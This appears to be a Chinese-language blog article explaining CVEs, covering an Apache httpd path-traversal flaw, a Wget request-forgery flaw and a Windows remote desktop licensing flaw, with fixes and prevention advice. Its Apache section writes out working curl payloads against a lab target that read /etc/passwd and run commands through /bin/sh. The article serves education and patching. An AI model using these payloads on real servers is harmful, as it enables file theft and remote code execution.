一、
CVE(Common Vulnerabilities and Exposures,通用漏洞和暴露)是一个行业标准的数据库,旨在为公众提供有关安全漏洞和暴露的详细信息,CVE ID是分配给每个漏洞的唯一标识符,有助于标准化和简化对漏洞的描述和管理。
二、Apache HTTP Server 路径穿越漏洞(CVE-2021-41773)
1. 漏洞描述
Apache HTTP Server (httpd) 2.4.49版本中存在一个路径遍历漏洞,编号为CVE-2021-41773,该漏洞允许攻击者在特定条件下访问服务器文件系统上的任意文件。
2. 影响范围
此漏洞影响Apache HTTP Server 2.4.49版本,需要注意的是,2.4.50版本并未完全修复此问题。
3. 漏洞原理
在处理用户请求中的路径参数时,Apache使用的ap_normalize_path
函数未能正确检测某些特殊构造的路径(如.%2e/
或%2e%2e/
),导致路径遍历攻击成为可能。
4. 复现步骤
1、使用vulhub搭建漏洞环境:
cd vulhub/httpd/CVE-2021-41773 sudo docker-compose up -d
2、获取靶机IP地址并访问默认页面以确认服务运行正常。
3、使用curl命令读取敏感文件:
curl -v --path-as-is http://10.0.2.15:8080/icons/.%2e/.%2e/.%2e/.%2e/etc/passwd
4、远程执行命令:
curl -v --data "echo;id" 'http://10.0.2.15:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
5. 修复建议
升级到Apache HTTP Server 2.4.51及以上版本。
三、Wget服务器端请求伪造漏洞(CVE-2024-10524)
1. 漏洞详情
GNU Wget 1.24.5及之前版本中存在一个解析不当导致的服务器端请求伪造漏洞(CVE-2024-10524),该漏洞源于Wget在处理HTTP简写格式URL时的错误解析,可能导致恶意请求被发送到错误的服务器。
2. 影响范围
所有Wget 1.24.5及之前版本的用户均受影响。
3. 漏洞利用
攻击者通过控制简写URL中的用户信息部分,可以将原本应为HTTP请求的URL错误地解析为FTP请求,从而改变请求目标,引发服务器端请求伪造攻击、钓鱼攻击、MITM攻击和数据泄露等风险。
4. 修复建议
升级到Wget 1.25.0或更高版本。
四、Windows远程桌面许可管理服务漏洞(CVE-2024-38077)
1. 漏洞背景
微软披露了一个远程代码执行超高危漏洞CVE-2024-38077,CVSS评分高达9.8,影响开启了远程桌面许可服务的Windows服务器,该漏洞允许攻击者无需任何前置条件即可获取服务器最高权限。
2. 影响范围
该漏洞影响Windows Server 2000到Windows Server 2025所有版本。
3. 漏洞复现与分析
1、未安装RDL远程桌面授权服务:未安装状态下,漏洞检测工具显示“Server Not installed”。
2、安装RDL远程桌面授权服务:安装后,使用漏洞检测工具可验证漏洞存在。
4. 修复建议
1、自动检查更新:通过Windows设置中的“更新和安全”选项检查并安装可用更新。
2、手动下载补丁并安装:对于不能自动更新的系统版本,可手动下载适用于该系统的补丁包进行安装。
五、相关问题与解答栏目
Q1: 如何预防路径遍历漏洞?
A1: 预防路径遍历漏洞的方法包括输入验证、输出编码、使用安全的库函数以及遵循最小权限原则,开发者应确保应用程序只接受预期内的输入,并对用户输入进行严格的验证和清理,及时应用安全补丁也是预防已知漏洞的重要手段。
Q2: 如果无法立即升级受影响的软件版本,应采取哪些临时措施?
A2: 如果无法立即升级受影响的软件版本,可以采取以下临时措施来降低风险:限制受影响系统的网络访问权限,仅允许必要的流量通过;实施入侵检测和防御系统(IDS/IPS);监控异常活动;备份重要数据;以及及时关注厂商发布的安全公告和补丁信息。
小伙伴们,上文介绍了“服务器漏洞 cve”的内容,你了解清楚吗?希望对你有所帮助,任何问题可以给我留言,让我们下期再见吧。
原创文章,作者:K-seo,如若转载,请注明出处:https://www.kdun.cn/ask/749200.html